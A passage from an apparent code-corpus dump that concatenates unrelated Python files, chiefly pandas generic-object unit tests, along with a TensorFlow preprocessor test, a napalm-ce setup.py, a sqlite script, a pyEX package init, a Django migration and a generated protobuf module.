'random_coef': [0.375, 0.375],
'min_padded_size_ratio': (1.0, 1.0),
'max_padded_size_ratio': (2.0, 2.0)})
def test_build_normalize_image_convert_class_logits_to_softmax(self):
preprocessor_text_proto = """
convert_class_logits_to_softmax {
temperature: 2
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.convert_class_logits_to_softmax)
self.assertEqual(args, {'temperature': 2})
def test_random_crop_by_scale(self):
preprocessor_text_proto = """
random_square_crop_by_scale {
scale_min: 0.25
scale_max: 2.0
num_scales: 8
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Merge(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.random_square_crop_by_scale)
self.assertEqual(args, {
'scale_min': 0.25,
'scale_max': 2.0,
'num_scales': 8,
'max_border': 128
})
def test_adjust_gamma(self):
preprocessor_text_proto = """
adjust_gamma {
gamma: 2.2
gain: 2.0
}
"""
preprocessor_proto = preprocessor_pb2.PreprocessingStep()
text_format.Parse(preprocessor_text_proto, preprocessor_proto)
function, args = preprocessor_builder.build(preprocessor_proto)
self.assertEqual(function, preprocessor.adjust_gamma)
self.assert_dictionary_close(args, {'gamma': 2.2, 'gain': 2.0})
if __name__ == '__main__':
tf.test.main()
|
py | 1a4a08b22bfc4738c5fe3fadf65ff21ddb2e3fea | DEFAULT_INTERVAL_MS = 20 # 50 fps
DEFAULT_FIELDER_HEIGHT = 2 # meters
DEFAULT_BALLS_IN_PLAY = 100
FIELD_RADIUS = 255 / 3.28
|
py | 1a4a08da9605589d5da7e2d9b23bae6d9f5eb39a | """setup.py file."""
import uuid
from setuptools import setup, find_packages
try: # for pip >= 10
from pip._internal.req import parse_requirements
except ImportError: # for pip <= 9.0.3
from pip.req import parse_requirements
__author__ = 'Hao Tang <[email protected]>'
install_reqs = parse_requirements('requirements.txt', session=uuid.uuid1())
try:
reqs = [str(ir.req) for ir in install_reqs]
except:
reqs = [str(ir.requirement) for ir in install_reqs]
setup(
name="napalm-ce",
version="0.1.1",
packages=find_packages(),
author="Hao Tang",
author_email="[email protected]",
description="Network Automation and Programmability Abstraction Layer with Multivendor support",
classifiers=[
'Topic :: Utilities',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS',
],
url="https://github.com/napalm-automation-community/napalm-ce",
include_package_data=True,
install_requires=reqs,
)
|
py | 1a4a0b13e9d47fb32a8c42be70b373ef8a1d7c56 | # hw_02_sql.py
# import sqlite3 library
import sqlite3
with sqlite3.connect('car.db') as connection:
cursor = connection.cursor()
cursor.execute("UPDATE inventory SET quantity=6 WHERE make='Ford' and model='2016'")
cursor.execute("UPDATE inventory SET quantity=4 WHERE make='Honda' and model='2012'")
print("NEW DATA:\n\n")
cursor.execute("SELECT * from inventory")
for row in cursor.fetchall():
print(row[0], row[1], row[2])
|
py | 1a4a0b1678aa46b81afa456207d1f099e66ff786 | from copy import copy, deepcopy
import numpy as np
import pytest
from pandas.compat.numpy import _np_version_under1p17
from pandas.core.dtypes.common import is_scalar
import pandas as pd
from pandas import DataFrame, MultiIndex, Series, date_range
import pandas._testing as tm
import pandas.core.common as com
# ----------------------------------------------------------------------
# Generic types test cases
class Generic:
@property
def _ndim(self):
return self._typ._AXIS_LEN
def _axes(self):
""" return the axes for my object typ """
return self._typ._AXIS_ORDERS
def _construct(self, shape, value=None, dtype=None, **kwargs):
"""
construct an object for the given shape
if value is specified use that if its a scalar
if value is an array, repeat it as needed
"""
if isinstance(shape, int):
shape = tuple([shape] * self._ndim)
if value is not None:
if is_scalar(value):
if value == "empty":
arr = None
dtype = np.float64
# remove the info axis
kwargs.pop(self._typ._info_axis_name, None)
else:
arr = np.empty(shape, dtype=dtype)
arr.fill(value)
else:
fshape = np.prod(shape)
arr = value.ravel()
new_shape = fshape / arr.shape[0]
if fshape % arr.shape[0] != 0:
raise Exception("invalid value passed in _construct")
arr = np.repeat(arr, new_shape).reshape(shape)
else:
arr = np.random.randn(*shape)
return self._typ(arr, dtype=dtype, **kwargs)
def _compare(self, result, expected):
self._comparator(result, expected)
def test_rename(self):
# single axis
idx = list("ABCD")
# relabeling values passed into self.rename
args = [
str.lower,
{x: x.lower() for x in idx},
Series({x: x.lower() for x in idx}),
]
for axis in self._axes():
kwargs = {axis: idx}
obj = self._construct(4, **kwargs)
for arg in args:
# rename a single axis
result = obj.rename(**{axis: arg})
expected = obj.copy()
setattr(expected, axis, list("abcd"))
self._compare(result, expected)
# multiple axes at once
def test_get_numeric_data(self):
n = 4
kwargs = {self._typ._AXIS_NAMES[i]: list(range(n)) for i in range(self._ndim)}
# get the numeric data
o = self._construct(n, **kwargs)
result = o._get_numeric_data()
self._compare(result, o)
# non-inclusion
result = o._get_bool_data()
expected = self._construct(n, value="empty", **kwargs)
self._compare(result, expected)
# get the bool data
arr = np.array([True, True, False, True])
o = self._construct(n, value=arr, **kwargs)
result = o._get_numeric_data()
self._compare(result, o)
# _get_numeric_data is includes _get_bool_data, so can't test for
# non-inclusion
def test_nonzero(self):
# GH 4633
# look at the boolean/nonzero behavior for objects
obj = self._construct(shape=4)
msg = f"The truth value of a {self._typ.__name__} is ambiguous"
with pytest.raises(ValueError, match=msg):
bool(obj == 0)
with pytest.raises(ValueError, match=msg):
bool(obj == 1)
with pytest.raises(ValueError, match=msg):
bool(obj)
obj = self._construct(shape=4, value=1)
with pytest.raises(ValueError, match=msg):
bool(obj == 0)
with pytest.raises(ValueError, match=msg):
bool(obj == 1)
with pytest.raises(ValueError, match=msg):
bool(obj)
obj = self._construct(shape=4, value=np.nan)
with pytest.raises(ValueError, match=msg):
bool(obj == 0)
with pytest.raises(ValueError, match=msg):
bool(obj == 1)
with pytest.raises(ValueError, match=msg):
bool(obj)
# empty
obj = self._construct(shape=0)
with pytest.raises(ValueError, match=msg):
bool(obj)
# invalid behaviors
obj1 = self._construct(shape=4, value=1)
obj2 = self._construct(shape=4, value=1)
with pytest.raises(ValueError, match=msg):
if obj1:
pass
with pytest.raises(ValueError, match=msg):
obj1 and obj2
with pytest.raises(ValueError, match=msg):
obj1 or obj2
with pytest.raises(ValueError, match=msg):
not obj1
def test_downcast(self):
# test close downcasting
o = self._construct(shape=4, value=9, dtype=np.int64)
result = o.copy()
result._data = o._data.downcast()
self._compare(result, o)
o = self._construct(shape=4, value=9.5)
result = o.copy()
result._data = o._data.downcast()
self._compare(result, o)
def test_constructor_compound_dtypes(self):
# see gh-5191
# Compound dtypes should raise NotImplementedError.
def f(dtype):
return self._construct(shape=3, value=1, dtype=dtype)
msg = (
"compound dtypes are not implemented "
f"in the {self._typ.__name__} constructor"
)
with pytest.raises(NotImplementedError, match=msg):
f([("A", "datetime64[h]"), ("B", "str"), ("C", "int32")])
# these work (though results may be unexpected)
f("int64")
f("float64")
f("M8[ns]")
def check_metadata(self, x, y=None):
for m in x._metadata:
v = getattr(x, m, None)
if y is None:
assert v is None
else:
assert v == getattr(y, m, None)
def test_metadata_propagation(self):
# check that the metadata matches up on the resulting ops
o = self._construct(shape=3)
o.name = "foo"
o2 = self._construct(shape=3)
o2.name = "bar"
# ----------
# preserving
# ----------
# simple ops with scalars
for op in ["__add__", "__sub__", "__truediv__", "__mul__"]:
result = getattr(o, op)(1)
self.check_metadata(o, result)
# ops with like
for op in ["__add__", "__sub__", "__truediv__", "__mul__"]:
result = getattr(o, op)(o)
self.check_metadata(o, result)
# simple boolean
for op in ["__eq__", "__le__", "__ge__"]:
v1 = getattr(o, op)(o)
self.check_metadata(o, v1)
self.check_metadata(o, v1 & v1)
self.check_metadata(o, v1 | v1)
# combine_first
result = o.combine_first(o2)
self.check_metadata(o, result)
# ---------------------------
# non-preserving (by default)
# ---------------------------
# add non-like
result = o + o2
self.check_metadata(result)
# simple boolean
for op in ["__eq__", "__le__", "__ge__"]:
# this is a name matching op
v1 = getattr(o, op)(o)
v2 = getattr(o, op)(o2)
self.check_metadata(v2)
self.check_metadata(v1 & v2)
self.check_metadata(v1 | v2)
def test_head_tail(self, indices):
# GH5370
o = self._construct(shape=len(indices))
axis = o._get_axis_name(0)
setattr(o, axis, indices)
o.head()
self._compare(o.head(), o.iloc[:5])
self._compare(o.tail(), o.iloc[-5:])
# 0-len
self._compare(o.head(0), o.iloc[0:0])
self._compare(o.tail(0), o.iloc[0:0])
# bounded
self._compare(o.head(len(o) + 1), o)
self._compare(o.tail(len(o) + 1), o)
# neg index
self._compare(o.head(-3), o.head(len(indices) - 3))
self._compare(o.tail(-3), o.tail(len(indices) - 3))
def test_sample(self):
# Fixes issue: 2419
o = self._construct(shape=10)
###
# Check behavior of random_state argument
###
# Check for stability when receives seed or random state -- run 10
# times.
for test in range(10):
seed = np.random.randint(0, 100)
self._compare(
o.sample(n=4, random_state=seed), o.sample(n=4, random_state=seed)
)
self._compare(
o.sample(frac=0.7, random_state=seed),
o.sample(frac=0.7, random_state=seed),
)
self._compare(
o.sample(n=4, random_state=np.random.RandomState(test)),
o.sample(n=4, random_state=np.random.RandomState(test)),
)
self._compare(
o.sample(frac=0.7, random_state=np.random.RandomState(test)),
o.sample(frac=0.7, random_state=np.random.RandomState(test)),
)
self._compare(
o.sample(
frac=2, replace=True, random_state=np.random.RandomState(test)
),
o.sample(
frac=2, replace=True, random_state=np.random.RandomState(test)
),
)
os1, os2 = [], []
for _ in range(2):
np.random.seed(test)
os1.append(o.sample(n=4))
os2.append(o.sample(frac=0.7))
self._compare(*os1)
self._compare(*os2)
# Check for error when random_state argument invalid.
with pytest.raises(ValueError):
o.sample(random_state="astring!")
###
# Check behavior of `frac` and `N`
###
# Giving both frac and N throws error
with pytest.raises(ValueError):
o.sample(n=3, frac=0.3)
# Check that raises right error for negative lengths
with pytest.raises(ValueError):
o.sample(n=-3)
with pytest.raises(ValueError):
o.sample(frac=-0.3)
# Make sure float values of `n` give error
with pytest.raises(ValueError):
o.sample(n=3.2)
# Check lengths are right
assert len(o.sample(n=4) == 4)
assert len(o.sample(frac=0.34) == 3)
assert len(o.sample(frac=0.36) == 4)
###
# Check weights
###
# Weight length must be right
with pytest.raises(ValueError):
o.sample(n=3, weights=[0, 1])
with pytest.raises(ValueError):
bad_weights = [0.5] * 11
o.sample(n=3, weights=bad_weights)
with pytest.raises(ValueError):
bad_weight_series = Series([0, 0, 0.2])
o.sample(n=4, weights=bad_weight_series)
# Check won't accept negative weights
with pytest.raises(ValueError):
bad_weights = [-0.1] * 10
o.sample(n=3, weights=bad_weights)
# Check inf and -inf throw errors:
with pytest.raises(ValueError):
weights_with_inf = [0.1] * 10
weights_with_inf[0] = np.inf
o.sample(n=3, weights=weights_with_inf)
with pytest.raises(ValueError):
weights_with_ninf = [0.1] * 10
weights_with_ninf[0] = -np.inf
o.sample(n=3, weights=weights_with_ninf)
# All zeros raises errors
zero_weights = [0] * 10
with pytest.raises(ValueError):
o.sample(n=3, weights=zero_weights)
# All missing weights
nan_weights = [np.nan] * 10
with pytest.raises(ValueError):
o.sample(n=3, weights=nan_weights)
# Check np.nan are replaced by zeros.
weights_with_nan = [np.nan] * 10
weights_with_nan[5] = 0.5
self._compare(o.sample(n=1, axis=0, weights=weights_with_nan), o.iloc[5:6])
# Check None are also replaced by zeros.
weights_with_None = [None] * 10
weights_with_None[5] = 0.5
self._compare(o.sample(n=1, axis=0, weights=weights_with_None), o.iloc[5:6])
def test_sample_upsampling_without_replacement(self):
# GH27451
df = pd.DataFrame({"A": list("abc")})
msg = (
"Replace has to be set to `True` when "
"upsampling the population `frac` > 1."
)
with pytest.raises(ValueError, match=msg):
df.sample(frac=2, replace=False)
def test_sample_is_copy(self):
# GH-27357, GH-30784: ensure the result of sample is an actual copy and
# doesn't track the parent dataframe / doesn't give SettingWithCopy warnings
df = pd.DataFrame(np.random.randn(10, 3), columns=["a", "b", "c"])
df2 = df.sample(3)
with tm.assert_produces_warning(None):
df2["d"] = 1
def test_size_compat(self):
# GH8846
# size property should be defined
o = self._construct(shape=10)
assert o.size == np.prod(o.shape)
assert o.size == 10 ** len(o.axes)
def test_split_compat(self):
# xref GH8846
o = self._construct(shape=10)
assert len(np.array_split(o, 5)) == 5
assert len(np.array_split(o, 2)) == 2
# See gh-12301
def test_stat_unexpected_keyword(self):
obj = self._construct(5)
starwars = "Star Wars"
errmsg = "unexpected keyword"
with pytest.raises(TypeError, match=errmsg):
obj.max(epic=starwars) # stat_function
with pytest.raises(TypeError, match=errmsg):
obj.var(epic=starwars) # stat_function_ddof
with pytest.raises(TypeError, match=errmsg):
obj.sum(epic=starwars) # cum_function
with pytest.raises(TypeError, match=errmsg):
obj.any(epic=starwars) # logical_function
@pytest.mark.parametrize("func", ["sum", "cumsum", "any", "var"])
def test_api_compat(self, func):
# GH 12021
# compat for __name__, __qualname__
obj = self._construct(5)
f = getattr(obj, func)
assert f.__name__ == func
assert f.__qualname__.endswith(func)
def test_stat_non_defaults_args(self):
obj = self._construct(5)
out = np.array([0])
errmsg = "the 'out' parameter is not supported"
with pytest.raises(ValueError, match=errmsg):
obj.max(out=out) # stat_function
with pytest.raises(ValueError, match=errmsg):
obj.var(out=out) # stat_function_ddof
with pytest.raises(ValueError, match=errmsg):
obj.sum(out=out) # cum_function
with pytest.raises(ValueError, match=errmsg):
obj.any(out=out) # logical_function
def test_truncate_out_of_bounds(self):
# GH11382
# small
shape = [int(2e3)] + ([1] * (self._ndim - 1))
small = self._construct(shape, dtype="int8", value=1)
self._compare(small.truncate(), small)
self._compare(small.truncate(before=0, after=3e3), small)
self._compare(small.truncate(before=-1, after=2e3), small)
# big
shape = [int(2e6)] + ([1] * (self._ndim - 1))
big = self._construct(shape, dtype="int8", value=1)
self._compare(big.truncate(), big)
self._compare(big.truncate(before=0, after=3e6), big)
self._compare(big.truncate(before=-1, after=2e6), big)
@pytest.mark.parametrize(
"func",
[copy, deepcopy, lambda x: x.copy(deep=False), lambda x: x.copy(deep=True)],
)
@pytest.mark.parametrize("shape", [0, 1, 2])
def test_copy_and_deepcopy(self, shape, func):
# GH 15444
obj = self._construct(shape)
obj_copy = func(obj)
assert obj_copy is not obj
self._compare(obj_copy, obj)
@pytest.mark.parametrize(
"periods,fill_method,limit,exp",
[
(1, "ffill", None, [np.nan, np.nan, np.nan, 1, 1, 1.5, 0, 0]),
(1, "ffill", 1, [np.nan, np.nan, np.nan, 1, 1, 1.5, 0, np.nan]),
(1, "bfill", None, [np.nan, 0, 0, 1, 1, 1.5, np.nan, np.nan]),
(1, "bfill", 1, [np.nan, np.nan, 0, 1, 1, 1.5, np.nan, np.nan]),
(-1, "ffill", None, [np.nan, np.nan, -0.5, -0.5, -0.6, 0, 0, np.nan]),
(-1, "ffill", 1, [np.nan, np.nan, -0.5, -0.5, -0.6, 0, np.nan, np.nan]),
(-1, "bfill", None, [0, 0, -0.5, -0.5, -0.6, np.nan, np.nan, np.nan]),
(-1, "bfill", 1, [np.nan, 0, -0.5, -0.5, -0.6, np.nan, np.nan, np.nan]),
],
)
def test_pct_change(self, periods, fill_method, limit, exp):
vals = [np.nan, np.nan, 1, 2, 4, 10, np.nan, np.nan]
obj = self._typ(vals)
func = getattr(obj, "pct_change")
res = func(periods=periods, fill_method=fill_method, limit=limit)
if type(obj) is DataFrame:
tm.assert_frame_equal(res, DataFrame(exp))
else:
tm.assert_series_equal(res, Series(exp))
class TestNDFrame:
# tests that don't fit elsewhere
def test_sample(sel):
# Fixes issue: 2419
# additional specific object based tests
# A few dataframe test with degenerate weights.
easy_weight_list = [0] * 10
easy_weight_list[5] = 1
df = pd.DataFrame(
{
"col1": range(10, 20),
"col2": range(20, 30),
"colString": ["a"] * 10,
"easyweights": easy_weight_list,
}
)
sample1 = df.sample(n=1, weights="easyweights")
tm.assert_frame_equal(sample1, df.iloc[5:6])
# Ensure proper error if string given as weight for Series or
# DataFrame with axis = 1.
s = Series(range(10))
with pytest.raises(ValueError):
s.sample(n=3, weights="weight_column")
with pytest.raises(ValueError):
df.sample(n=1, weights="weight_column", axis=1)
# Check weighting key error
with pytest.raises(
KeyError, match="'String passed to weights not a valid column'"
):
df.sample(n=3, weights="not_a_real_column_name")
# Check that re-normalizes weights that don't sum to one.
weights_less_than_1 = [0] * 10
weights_less_than_1[0] = 0.5
tm.assert_frame_equal(df.sample(n=1, weights=weights_less_than_1), df.iloc[:1])
###
# Test axis argument
###
# Test axis argument
df = pd.DataFrame({"col1": range(10), "col2": ["a"] * 10})
second_column_weight = [0, 1]
tm.assert_frame_equal(
df.sample(n=1, axis=1, weights=second_column_weight), df[["col2"]]
)
# Different axis arg types
tm.assert_frame_equal(
df.sample(n=1, axis="columns", weights=second_column_weight), df[["col2"]]
)
weight = [0] * 10
weight[5] = 0.5
tm.assert_frame_equal(df.sample(n=1, axis="rows", weights=weight), df.iloc[5:6])
tm.assert_frame_equal(
df.sample(n=1, axis="index", weights=weight), df.iloc[5:6]
)
# Check out of range axis values
with pytest.raises(ValueError):
df.sample(n=1, axis=2)
with pytest.raises(ValueError):
df.sample(n=1, axis="not_a_name")
with pytest.raises(ValueError):
s = pd.Series(range(10))
s.sample(n=1, axis=1)
# Test weight length compared to correct axis
with pytest.raises(ValueError):
df.sample(n=1, axis=1, weights=[0.5] * 10)
# Check weights with axis = 1
easy_weight_list = [0] * 3
easy_weight_list[2] = 1
df = pd.DataFrame(
{"col1": range(10, 20), "col2": range(20, 30), "colString": ["a"] * 10}
)
sample1 = df.sample(n=1, axis=1, weights=easy_weight_list)
tm.assert_frame_equal(sample1, df[["colString"]])
# Test default axes
tm.assert_frame_equal(
df.sample(n=3, random_state=42), df.sample(n=3, axis=0, random_state=42)
)
# Test that function aligns weights with frame
df = DataFrame({"col1": [5, 6, 7], "col2": ["a", "b", "c"]}, index=[9, 5, 3])
s = Series([1, 0, 0], index=[3, 5, 9])
tm.assert_frame_equal(df.loc[[3]], df.sample(1, weights=s))
# Weights have index values to be dropped because not in
# sampled DataFrame
s2 = Series([0.001, 0, 10000], index=[3, 5, 10])
tm.assert_frame_equal(df.loc[[3]], df.sample(1, weights=s2))
# Weights have empty values to be filed with zeros
s3 = Series([0.01, 0], index=[3, 5])
tm.assert_frame_equal(df.loc[[3]], df.sample(1, weights=s3))
# No overlap in weight and sampled DataFrame indices
s4 = Series([1, 0], index=[1, 2])
with pytest.raises(ValueError):
df.sample(1, weights=s4)
@pytest.mark.parametrize(
"func_str,arg",
[
("np.array", [2, 3, 1, 0]),
pytest.param(
"np.random.MT19937",
3,
marks=pytest.mark.skipif(_np_version_under1p17, reason="NumPy<1.17"),
),
pytest.param(
"np.random.PCG64",
11,
marks=pytest.mark.skipif(_np_version_under1p17, reason="NumPy<1.17"),
),
],
)
def test_sample_random_state(self, func_str, arg):
# GH32503
df = pd.DataFrame({"col1": range(10, 20), "col2": range(20, 30)})
result = df.sample(n=3, random_state=eval(func_str)(arg))
expected = df.sample(n=3, random_state=com.random_state(eval(func_str)(arg)))
tm.assert_frame_equal(result, expected)
def test_squeeze(self):
# noop
for s in [tm.makeFloatSeries(), tm.makeStringSeries(), tm.makeObjectSeries()]:
tm.assert_series_equal(s.squeeze(), s)
for df in [tm.makeTimeDataFrame()]:
tm.assert_frame_equal(df.squeeze(), df)
# squeezing
df = tm.makeTimeDataFrame().reindex(columns=["A"])
tm.assert_series_equal(df.squeeze(), df["A"])
# don't fail with 0 length dimensions GH11229 & GH8999
empty_series = Series([], name="five", dtype=np.float64)
empty_frame = DataFrame([empty_series])
tm.assert_series_equal(empty_series, empty_series.squeeze())
tm.assert_series_equal(empty_series, empty_frame.squeeze())
# axis argument
df = tm.makeTimeDataFrame(nper=1).iloc[:, :1]
assert df.shape == (1, 1)
tm.assert_series_equal(df.squeeze(axis=0), df.iloc[0])
tm.assert_series_equal(df.squeeze(axis="index"), df.iloc[0])
tm.assert_series_equal(df.squeeze(axis=1), df.iloc[:, 0])
tm.assert_series_equal(df.squeeze(axis="columns"), df.iloc[:, 0])
assert df.squeeze() == df.iloc[0, 0]
msg = "No axis named 2 for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.squeeze(axis=2)
msg = "No axis named x for object type DataFrame"
with pytest.raises(ValueError, match=msg):
df.squeeze(axis="x")
df = tm.makeTimeDataFrame(3)
tm.assert_frame_equal(df.squeeze(axis=0), df)
def test_numpy_squeeze(self):
s = tm.makeFloatSeries()
tm.assert_series_equal(np.squeeze(s), s)
df = tm.makeTimeDataFrame().reindex(columns=["A"])
tm.assert_series_equal(np.squeeze(df), df["A"])
def test_transpose(self):
for s in [tm.makeFloatSeries(), tm.makeStringSeries(), tm.makeObjectSeries()]:
# calls implementation in pandas/core/base.py
tm.assert_series_equal(s.transpose(), s)
for df in [tm.makeTimeDataFrame()]:
tm.assert_frame_equal(df.transpose().transpose(), df)
def test_numpy_transpose(self):
msg = "the 'axes' parameter is not supported"
s = tm.makeFloatSeries()
tm.assert_series_equal(np.transpose(s), s)
with pytest.raises(ValueError, match=msg):
np.transpose(s, axes=1)
df = tm.makeTimeDataFrame()
tm.assert_frame_equal(np.transpose(np.transpose(df)), df)
with pytest.raises(ValueError, match=msg):
np.transpose(df, axes=1)
def test_take(self):
indices = [1, 5, -2, 6, 3, -1]
for s in [tm.makeFloatSeries(), tm.makeStringSeries(), tm.makeObjectSeries()]:
out = s.take(indices)
expected = Series(
data=s.values.take(indices), index=s.index.take(indices), dtype=s.dtype
)
tm.assert_series_equal(out, expected)
for df in [tm.makeTimeDataFrame()]:
out = df.take(indices)
expected = DataFrame(
data=df.values.take(indices, axis=0),
index=df.index.take(indices),
columns=df.columns,
)
tm.assert_frame_equal(out, expected)
def test_take_invalid_kwargs(self):
indices = [-3, 2, 0, 1]
s = tm.makeFloatSeries()
df = tm.makeTimeDataFrame()
for obj in (s, df):
msg = r"take\(\) got an unexpected keyword argument 'foo'"
with pytest.raises(TypeError, match=msg):
obj.take(indices, foo=2)
msg = "the 'out' parameter is not supported"
with pytest.raises(ValueError, match=msg):
obj.take(indices, out=indices)
msg = "the 'mode' parameter is not supported"
with pytest.raises(ValueError, match=msg):
obj.take(indices, mode="clip")
@pytest.mark.parametrize("is_copy", [True, False])
def test_depr_take_kwarg_is_copy(self, is_copy):
# GH 27357
df = DataFrame({"A": [1, 2, 3]})
msg = (
"is_copy is deprecated and will be removed in a future version. "
"'take' always returns a copy, so there is no need to specify this."
)
with tm.assert_produces_warning(FutureWarning) as w:
df.take([0, 1], is_copy=is_copy)
assert w[0].message.args[0] == msg
s = Series([1, 2, 3])
with tm.assert_produces_warning(FutureWarning):
s.take([0, 1], is_copy=is_copy)
def test_equals(self):
s1 = pd.Series([1, 2, 3], index=[0, 2, 1])
s2 = s1.copy()
assert s1.equals(s2)
s1[1] = 99
assert not s1.equals(s2)
# NaNs compare as equal
s1 = pd.Series([1, np.nan, 3, np.nan], index=[0, 2, 1, 3])
s2 = s1.copy()
assert s1.equals(s2)
s2[0] = 9.9
assert not s1.equals(s2)
idx = MultiIndex.from_tuples([(0, "a"), (1, "b"), (2, "c")])
s1 = Series([1, 2, np.nan], index=idx)
s2 = s1.copy()
assert s1.equals(s2)
# Add object dtype column with nans
index = np.random.random(10)
df1 = DataFrame(np.random.random(10), index=index, columns=["floats"])
df1["text"] = "the sky is so blue. we could use more chocolate.".split()
df1["start"] = date_range("2000-1-1", periods=10, freq="T")
df1["end"] = date_range("2000-1-1", periods=10, freq="D")
df1["diff"] = df1["end"] - df1["start"]
df1["bool"] = np.arange(10) % 3 == 0
df1.loc[::2] = np.nan
df2 = df1.copy()
assert df1["text"].equals(df2["text"])
assert df1["start"].equals(df2["start"])
assert df1["end"].equals(df2["end"])
assert df1["diff"].equals(df2["diff"])
assert df1["bool"].equals(df2["bool"])
assert df1.equals(df2)
assert not df1.equals(object)
# different dtype
different = df1.copy()
different["floats"] = different["floats"].astype("float32")
assert not df1.equals(different)
# different index
different_index = -index
different = df2.set_index(different_index)
assert not df1.equals(different)
# different columns
different = df2.copy()
different.columns = df2.columns[::-1]
assert not df1.equals(different)
# DatetimeIndex
index = pd.date_range("2000-1-1", periods=10, freq="T")
df1 = df1.set_index(index)
df2 = df1.copy()
assert df1.equals(df2)
# MultiIndex
df3 = df1.set_index(["text"], append=True)
df2 = df1.set_index(["text"], append=True)
assert df3.equals(df2)
df2 = df1.set_index(["floats"], append=True)
assert not df3.equals(df2)
# NaN in index
df3 = df1.set_index(["floats"], append=True)
df2 = df1.set_index(["floats"], append=True)
assert df3.equals(df2)
# GH 8437
a = pd.Series([False, np.nan])
b = pd.Series([False, np.nan])
c = pd.Series(index=range(2), dtype=object)
d = c.copy()
e = c.copy()
f = c.copy()
c[:-1] = d[:-1] = e[0] = f[0] = False
assert a.equals(a)
assert a.equals(b)
assert a.equals(c)
assert a.equals(d)
assert a.equals(e)
assert e.equals(f)
def test_pipe(self):
df = DataFrame({"A": [1, 2, 3]})
f = lambda x, y: x ** y
result = df.pipe(f, 2)
expected = DataFrame({"A": [1, 4, 9]})
tm.assert_frame_equal(result, expected)
result = df.A.pipe(f, 2)
tm.assert_series_equal(result, expected.A)
def test_pipe_tuple(self):
df = DataFrame({"A": [1, 2, 3]})
f = lambda x, y: y
result = df.pipe((f, "y"), 0)
tm.assert_frame_equal(result, df)
result = df.A.pipe((f, "y"), 0)
tm.assert_series_equal(result, df.A)
def test_pipe_tuple_error(self):
df = DataFrame({"A": [1, 2, 3]})
f = lambda x, y: y
with pytest.raises(ValueError):
df.pipe((f, "y"), x=1, y=0)
with pytest.raises(ValueError):
df.A.pipe((f, "y"), x=1, y=0)
@pytest.mark.parametrize("box", [pd.Series, pd.DataFrame])
def test_axis_classmethods(self, box):
obj = box(dtype=object)
values = (
list(box._AXIS_NAMES.keys())
+ list(box._AXIS_NUMBERS.keys())
+ list(box._AXIS_ALIASES.keys())
)
for v in values:
assert obj._get_axis_number(v) == box._get_axis_number(v)
assert obj._get_axis_name(v) == box._get_axis_name(v)
assert obj._get_block_manager_axis(v) == box._get_block_manager_axis(v)
|
py | 1a4a0c617019e781a0862a95b925c40823663703 | # *****************************************************************************
#
# Copyright (c) 2020, the pyEX authors.
#
# This file is part of the pyEX library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
from .common import (
PyEXception,
PyEXStopSSE,
overrideUrl,
setProxy,
)
from ._version import __version__
from .account import *
from .alternative import *
from .commodities import *
from .cryptocurrency import *
from .economic import *
from .files import *
from .fx import *
from .markets import *
from .metadata import *
from .mortgage import *
from .options import *
from .points import *
from .premium import *
from .rates import *
from .refdata import *
from .rules import create, delete, lookup
from .rules import output as ruleOutput
from .rules import pause, resume
from .rules import rule as ruleInfo
from .rules import rules, schema
from .stats import *
from .stocks import *
from .streaming.cryptocurrency import *
from .streaming.fx import *
from .streaming.news import *
from .streaming.sentiment import *
from .streaming.sse import *
from .streaming.stock import *
from .streaming.ws import *
from .timeseries import *
from .treasuries import *
from .client import * # noqa: F403
from .studies import * # noqa: F403
try:
from .caching import *
except ImportError:
pass
try:
from .zipline import *
except ImportError:
pass
|
py | 1a4a0ca2246a98461fbca04321decda07e722f1f | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('image_collection', '0006_imageslide_data_class'),
]
operations = [
migrations.AddField(
model_name='imageslide',
name='is_visible_on_mobile',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='imageslide',
name='mobile_link',
field=models.CharField(help_text='i.e. "{route: "shop/cateogry", categoryName: "artworks"}"', max_length=4000, verbose_name='mobile link', blank=True),
),
]
|
py | 1a4a0d476342e84df70e1210fe85f025831006d9 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: messages.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='messages.proto',
package='uniflex_framework',
serialized_pb=_b('\n\x0emessages.proto\x12\x11uniflex_framework\"\x19\n\tAttribute\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x18\n\x08\x46unction\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x15\n\x05\x45vent\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x17\n\x07Service\x12\x0c\n\x04name\x18\x01 \x02(\t\"\x16\n\x06\x44\x65vice\x12\x0c\n\x04name\x18\x01 \x02(\t\"\xa5\x03\n\x06Module\x12\x0c\n\x04uuid\x18\x01 \x02(\t\x12\x0c\n\x04name\x18\x02 \x02(\t\x12\x32\n\x04type\x18\x03 \x02(\x0e\x32$.uniflex_framework.Module.ModuleType\x12)\n\x06\x64\x65vice\x18\x04 \x01(\x0b\x32\x19.uniflex_framework.Device\x12\x30\n\nattributes\x18\x05 \x03(\x0b\x32\x1c.uniflex_framework.Attribute\x12.\n\tfunctions\x18\x06 \x03(\x0b\x32\x1b.uniflex_framework.Function\x12+\n\tin_events\x18\x07 \x03(\x0b\x32\x18.uniflex_framework.Event\x12,\n\nout_events\x18\x08 \x03(\x0b\x32\x18.uniflex_framework.Event\x12,\n\x08services\x18\t 